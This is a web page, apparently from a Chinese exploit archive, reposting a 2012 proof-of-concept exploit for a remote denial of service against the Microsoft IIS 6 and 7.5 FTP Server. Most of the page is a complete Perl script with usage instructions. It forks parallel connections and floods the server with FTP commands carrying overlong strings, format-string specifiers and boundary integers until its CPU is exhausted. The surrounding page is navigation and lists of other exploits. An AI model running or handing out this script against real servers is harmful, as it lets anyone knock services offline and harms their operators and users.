首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service 来源：https://twitter.com/coolkaveh 作者：coolkaveh 发布时间：2012-07-03   # Exploit Title: Microsoft IIS 6 , 7.5  FTP Server Remote Denial Of Service (CPU exhaustion)[POC] # Author: coolkaveh # coolkaveh@rocketmail.com # https://twitter.com/coolkaveh # Vendor Homepage: http://www.microsoft.com # Version:  Microsoft IIS 6 , 7.5  FTP Server # Tested on: windows server 2008 r2 , seven , with two core prossosor #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #When sending multiple parallel FTP command  requests to a Microsoft IIS FTP Server #CPU usage goes up to max capacity  and server gets non responsive. #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Lame Microsoft IIS FTP Server Remote Denial Of Service #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/usr/bin/perl -w use IO::Socket; use Parallel::ForkManager; $|=1; sub usage {     print "FTP Server Remote Denial Of Service\n";     print "by coolkaveh\n";     print "usage: perl IISKILLER.pl <host> \n";     print "example: perl IISKILLER.pl www.example.com \n"; } $host=shift; $port=shift || "21"; if(!defined($host)){     print "FTP Server Remote Denial Of Service\n";     print "by coolkaveh\n";     print "usage: perl IISKILLER.pl <host> \n";     print "example: perl IISKILLER.pl www.example.com \n"; exit(0); } $check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60); if(defined $check_first){ print "$host -> $port is alive.\n"; $check_first->close; } else{ die("$host -> $port is closed!\n"); } @all=( 'A'x5,'A'x17,'A'x33,'A'x65,'A'x76,'A'x129,'A'x257,'A'x513,'A'x1024,'A'x2049,'A'x4097,'A'x8193,'A'x12288, '%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%99999999999s','%08x','%%20d','%%20n','%%20x','%%20s', '%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p','%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%', '%s'x129,'%x'x257,'-1','0','0x100','0x1000','0x3fffffff','0x7ffffffe','0x7fffffff','0x80000000','0xfffffffe','0xffffffff','0x10000', '0x100000','1', 'A'x5,'A'x17,'A'x33,'A'x65,'A'x76,'A'x129,'A'x257,'A'x513,'A'x1024,'A'x2049,'A'x4097,'A'x8193,'A'x12288, '%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%99999999999s','%08x','%%20d','%%20n','%%20x','%%20s', '%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p','%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%', '%s'x129,'%x'x257,'-1','0','0x100','0x1000','0x3fffffff','0x7ffffffe','0x7fffffff','0x80000000','0xfffffffe','0xffffffff','0x10000', '0x100000','1', ); sub check(){ #Thread->self->detach; $sock=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60); if(defined $sock){ #print "$host -> $port is alive.\n"; undef($content_tmp); $sock->recv($content_tmp,100,0); if(length($content_tmp)>0){ $sock->close; return 1; }else{ $sock->close; return 0; } }else{ #print("$host -> $port is closed!\n"); return 0; } } @command=( 'NLST','CWD','STOR','RETR','MKD','RMD','DELE','RNFR','RNTO','LIST',      'MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE', 'SITE INDEX','TYPE','TYPE A', 'TYPE E', 'TYPE L', 'TYPE I', 'NLST','CWD','STOR','RETR','MKD','RMD','DELE','RNFR','RNTO','LIST',      'MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE', 'SITE INDEX','TYPE','TYPE A', 'TYPE E', 'TYPE L', 'TYPE I', 'NLST','CWD','STOR','RETR','MKD','RMD','DELE','RNFR','RNTO','LIST',      'MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE', 'SITE INDEX','TYPE','TYPE A', 'TYPE E', 'TYPE L', 'TYPE I',             ); print "Start To Dos it!\n"; #enumerate command $pm = new Parallel::ForkManager(10); for($i = 1; $i < 9000; $i++) { my $pid = $pm->start and next;    COMMANDS: foreach $cmd (@command){ foreach $poc (@all){ LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30); if(defined($sock4)){ $sock4->send("$cmd"." "."$poc\r\n", 0); $sock4->recv($content, 0, 900); } } } $pm->finish; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·RealPlayer Plus 14.0.4.53 Real ·Photodex ProShow Producer 5.0. ·win32/7 Ultimate MessageBox Sh ·IBM Rational ClearQuest CQOle ·BoutikOne CSRF Add User Vulner ·Plow 0.0.5 Buffer Overflow ·BoutikOne ByPass & Download Ba ·Linux Kernel Local Denial Of S ·WANGKONGBAO CNS-1000 UTM IPS-F ·Apache Sling 2.1.0 Denial Of S ·Basilic 1.5.14 diff.php Arbitr ·BSD telnetd Remote Root Exploi   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved